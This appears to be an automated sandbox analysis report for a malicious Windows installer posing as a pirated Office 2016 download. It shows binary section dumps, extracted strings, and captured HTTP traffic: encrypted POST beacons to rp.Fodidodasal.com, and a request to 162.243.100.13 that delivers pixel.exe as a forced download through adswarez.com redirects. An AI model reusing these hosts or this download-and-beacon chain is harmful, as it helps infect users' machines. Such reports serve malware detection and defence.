..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....@.......B...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST /?v=2.0&subver=6.21&pcrc=745675320 HTTP/1.1
Accept: */*
Host: rp.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 2368
Cache-Control: no-cache
...4.....>.K..~.........u..i.Z..*...C3E
....x".....E.H\!oZ...;l2.b.E....m.rB....P.E.Bm.S..*.J.7-........:...T.`.U..2s!..L..c..h......n.e..>3j.Q..^..Z...wB..t...t...w.{.......x.4L.\,..I..Y$.....h...K.5....R...-.....c.wC.F
....u..l<...9.8wUr l.j..U....UjoM.......{Z. |{.......M.{.M.}...utA....d8...G....LTn.W;M2..D"SE4..QR..`.\.h9d96....r....5...'..~...V.V!.&gCF.n.....k...?...k.E.....4..M0KS&.3.0.....N.....6SZ..t..........!..Y...F...9......R...Vu..`J...t;7D*..}...N.....Om..3..Wn.XZ..Ep.p....9...C..A....Q..i..t...=z...0.k.u....u.{.......R.L#...Q.E..D..2.......q..c...7...e....\...@. .2.-......i....`H.N.3Y..r.....h.......V......bO].....`..Wy.....Pr./%....!....n4.3'V.u'..,.N....k).H..x...4?.^C:/}...h.0e.....vy...N...m.E.:...".......>.....sU}E..:..;...d@.....@.w.z1@.......7..q.k ...F.J&n.a........W...%.....j..c.,9^9.....
.p.b1....V..o........c@........../E.73...5..1..-z.........t/=k....`_OM9.;...........4.@8..x.RA.r..3 ..pZ..;.|.k`..}1...R".G.OV......2g%...|.u.....V..J........}.__.d..|.....2...2\;x$.......zi).>...-_T..U....%8....c.E..)......_.D.....lD..g.....,A.!=....f..U.-.kb......:.{.....).9..N.*..p...._)..Utk..\.....j$.#`..!.u...A.CJ.#(...u.....0.D..X/.21oQ....U3.......[.c,.MU...h..'[]..yv.L.. ..s|.2@"t.,.. .3......Q@?P...K....7K.A..Z..r...B.4..8f..O..NF...N.=.
..x_...s.2.M..5
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2016 04:59:26 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Mon, 02 May 2016 04:59:26 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..
POST /?v=2.0&subver=6.21&pcrc=198775596 HTTP/1.1
Accept: */*
Host: rp.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 1824
Cache-Control: no-cache
...3E.Q)_l.y...KJ..H ..d"..4....YC....$H..K.....m.*.2A.}.s.P...*..y....`-...w..r.d.......#.............V>$.c....1v.b..v.&-.c....>..3B../G..fmI.z.Q..<....Y.X.;.... .fO..0.'.!..5<.@..\.X.r......!....f.0.f^kdn....Q>..... r....x..mS.:}B.r.cX.T.&.l_..,.$;f.4..V.r..S.^..*3...|...=.....w.]....D
,...x.d.v..{S..&4f...K.E.i..q5.....&<.(]..:.un..5..6FDRw...H.QG..yG]..o3..
L.~C..`zu..9....=........}\..j..Y...G...P.Ot'8C..
.x.{r?............b..<X......>..-..-X9. .f..E..|xZ""..8.&....f...D......!.RO...*.l.u...@.B.?.zF.|....y.LP..O...h..b6:.,................gm-..a...:....../.....6.^......K.....j~J;Z....8A.....w.d..g..cjW. .y..t-...T.r..8....G.t.1Q..zU2.\..y..i`q
S..|.......2..x..*.-.{.*.W..c.1k.7.Als.EDW.3..=.....
H. \...q2R.(...o....F7...|....a..7....FzC..g.|..0....wY....S....b..T......G...7O.yu&.B.]=....WE.sk...h.q,o....ZRd<..=...L...IF....K..@..i.e.].:l...{%..\.F.:():......(L...S<q.....p>p..........\..j?.ys../....l..M.:wG.....F..X|.8=p.iN).....6.S.$..'..e.......'.R..z>.f[
.t
K....NDx....P.^1.5...4.nZ.*`lUS..E-TZ=..........IpeW.\.=..Nk.1............G...m...MwWJ....(.o..2.../.Olc.wR...J.....r.ys..O.r5.s..oLR...T.B`BE..I.Z......jY..]...M...~....|..'..4.&_.....NxC.\;..Y.W.1.Q/.JC.........N~.....X.g...v=.k..#..2z.....N...Rv...[.....nhr...`#...' YZ].d.yI......
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2016 04:59:28 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Mon, 02 May 2016 04:59:28 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..
HEAD /?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs HTTP/1.1
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 02 May 2016 04:59:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60723
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
GET /downloadimage/1264/13/d99394816486d094825965657734c00d/logo4.png?logotipo=automatico&uo=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&nada=true HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ad5.adswarez.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 02 May 2016 04:59:26 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db7251cddee5fc32504072ca48c5a02d71462165166; expires=Tue, 02-May-17 04:59:26 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
CF-Cache-Status: MISS
Expires: Mon, 02 May 2016 08:59:26 GMT
Cache-Control: public, max-age=14400
Server: cloudflare-nginx
CF-RAY: 29c8e75fcd393714-ARN
1cd9........JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100....C....................................................................C.......................................................................?.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....`q.=.@...G.A_.F;......ns...s.................#...s...;z...........^.....f?..K....u..j.z..4M_....(.O.t.2.W.o.8".-7N..........d.#...F...i........~..L...f...........t.o%...5..x'...3\K..e.>.y...F.d....h.3.G...$?............c.Jk^..?...a...........SH..F.....A6..5.K.{e..(.8.#}.i......A.....:..._.jz..f....jw....L?i.!..jz..7.r,1..y...h...@...=....X.........|#....X\...QG.......*.Z..f:.E..kb.....2P._I...k...l.8..fS..,.;1.L.~...y.c.b......cp..)..6....8l4....-...W....\N...?....-.. ,..A.........N...C.... .N6..y.a..........Uqi........o.....M.'._.............4KO.[x)t..h.G...{..5..........Y.. .[B..................<Y.j...4]o.v...Zx.E......A..3.c....?.h....R.|=...M.;.....u......../C..N..9.? .G.eT0.6.`..43\k....h...%l...5...5...J8.N4>.:.t^*.1........8.....W1....q9.W.L]...cr....S9....)....?.Z.....~.O....[[...#..m9.?>8$w.....9.c u<s.
<<< skipped >>>
HEAD /comp/1264/13/gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI.exe?plataforma=c1&&uo=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&ud=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html HTTP/1.1
Accept: */*
Host: ad5.adswarez.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Mon, 02 May 2016 04:59:28 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=d000249d68a1c0a85133403ba896186991462165168; expires=Tue, 02-May-17 04:59:28 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
Location: hXXp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs
Server: cloudflare-nginx
CF-RAY: 29c8e76cbefa3714-ARN
HTTP/1.1 302 Found..Date: Mon, 02 May 2016 04:59:28 GMT..Content-Type: text/html..Connection: keep-alive..Set-Cookie: __cfduid=d000249d68a1c0a85133403ba896186991462165168; expires=Tue, 02-May-17 04:59:28 GMT; path=/; domain=.adswarez.com; HttpOnly..X-Powered-By: PHP/5.5.7..Location: hXXp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs..Server: cloudflare-nginx..CF-RAY: 29c8e76cbefa3714-ARN..
<<< skipped >>>
Map
The Installer connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1676:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SUPPRESSMSGBOXES
/SUPPRESSMSGBOXES
/PASSWORD=password
/PASSWORD=password
Specifies the password to use.
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.3)
Inno Setup Messages (5.5.3)
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetWindowsDirectoryA
GetWindowsDirectoryA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
comctl32.dll
comctl32.dll
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Invalid variant operation"Variant method calls not supported
External exception %x
External exception %x
1.0.5.a0.1_54944
1.0.5.a0.1_54944
%original file name%.exe_1676_rwx_00900000_000F7000:
.idata
.idata
.edata
.edata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
>)a9>.aV>
>)a9>.aV>
.EXatuv
.EXatuv
.vRLFO
.vRLFO
g.rp=
g.rp=
asT.qykp
asT.qykp
.EW)$
.EW)$
.GYonVz
.GYonVz
N5:%C
N5:%C
.Rtyz/
.Rtyz/
v.Qzjab/Gdg
v.Qzjab/Gdg
^
^
.nk"n
.nk"n
8r7Q%c
8r7Q%c
l9.ZS0
l9.ZS0
%xJQtW
%xJQtW
n"!a.zo
n"!a.zo
@NtcP}
@NtcP}
%XRHt5
%XRHt5
$".kL
$".kL
.Iz\(
.Iz\(
Ub%Cy
Ub%Cy
.rzOn'$
.rzOn'$
.zY3-
.zY3-
c$%xzl4
c$%xzl4
Y8|t%d
Y8|t%d
C#h.np
C#h.np
H%f-Uw
H%f-Uw
.mlw3
.mlw3
_Jÿ
_Jÿ
AciekeYifeS;x
AciekeYifeS;x
>t.hk
>t.hk
a.NYc
a.NYc
C.oaa0
C.oaa0
c.XAs
c.XAs
duudpyq
duudpyq
z=%U;Mna
z=%U;Mna
i%X'ze
i%X'ze
%D'[b
%D'[b
e%D%(g
e%D%(g
`-AhsrPb\oK.dfj
`-AhsrPb\oK.dfj
2HN2G%d
2HN2G%d
.fh(S
.fh(S
.ZjnkUo
.ZjnkUo
YÑx*
YÑx*
.tsvtz06*_pj]R
.tsvtz06*_pj]R
V=-b}
V=-b}
rbg.sg"lj
rbg.sg"lj
nvze>6%Xj`
nvze>6%Xj`
lZgiqpWqyvaH%DH
lZgiqpWqyvaH%DH
CmdiHcJ(dTv
CmdiHcJ(dTv
%Cj^H
%Cj^H
%7uC,D
%7uC,D
.BV}%
.BV}%
".Ndqn
".Ndqn
.Eidi^D
.Eidi^D
QER.CK
QER.CK
OD.BL
OD.BL
'8503333
'8503333
g%XFh
g%XFh
:#cy%F
:#cy%F
TÉ-
TÉ-
.GKzL
.GKzL
p~t%uLp
p~t%uLp
.IOt8t
.IOt8t
U(.YJ
U(.YJ
%dizhkpe
%dizhkpe
XX.syB
XX.syB
;@37=
;@37=
P1@6084(>%DSUX
P1@6084(>%DSUX
=73=.Ux
=73=.Ux
850>\`)9
850>\`)9
O#%Fo-(
O#%Fo-(
Eaq%f
Eaq%f
!.PF?
!.PF?
#ZK.sr
#ZK.sr
.mmmlm-A
.mmmlm-A
.vhWttZi_jF
.vhWttZi_jF
dnf^n_ang1%Dqc
dnf^n_ang1%Dqc
UFLZ%X(Ud`SVH
UFLZ%X(Ud`SVH
UB^nk@aN.fR;
UB^nk@aN.fR;
.de=8.
.de=8.
_&3 g.tE
_&3 g.tE
n.SJ7
n.SJ7
n%CQ,W
n%CQ,W
ly.As
ly.As
Yk0~f64eS.sv5
Yk0~f64eS.sv5
mGz_mY%C
mGz_mY%C
.DD6'\
.DD6'\
_cmd>
_cmd>
R.%C=
R.%C=
%CH:8j
%CH:8j
.uvDcmq#0
.uvDcmq#0
.EbH8
.EbH8
!L
!L
z.Mc:d
z.Mc:d
4%s%"
4%s%"
.xVP$
.xVP$
.eavuMe
.eavuMe
7X.rk
7X.rk
ztYm%UV
ztYm%UV
-eh#%C
-eh#%C
)ra%X
)ra%X
ttcpr
ttcpr
SSh_z
SSh_z
kh'HSg%u
kh'HSg%u
.nleUdzyd
.nleUdzyd
(5u%U
(5u%U
U.GFr%
U.GFr%
VL.lpqagjy
VL.lpqagjy
WÓ's,q]
WÓ's,q]
jX.YS
jX.YS
.msws6
.msws6
n&%dj
n&%dj
O'%S2
O'%S2
zoh.ultbi
zoh.ultbi
wulfw3%XD
wulfw3%XD
/Kx5%X#'
/Kx5%X#'
l-kfp.uc-x
l-kfp.uc-x
2f-q@%U,_
2f-q@%U,_
a5X%sT#
a5X%sT#
f_i%U
f_i%U
PYVZ[SEUYYHV(36.HPR~K9
PYVZ[SEUYYHV(36.HPR~K9
jeZy%C
jeZy%C
h.uFf
h.uFf
$.BFU^m4
$.BFU^m4
ÊF[&6^
ÊF[&6^
@0E.GT5@=N2
@0E.GT5@=N2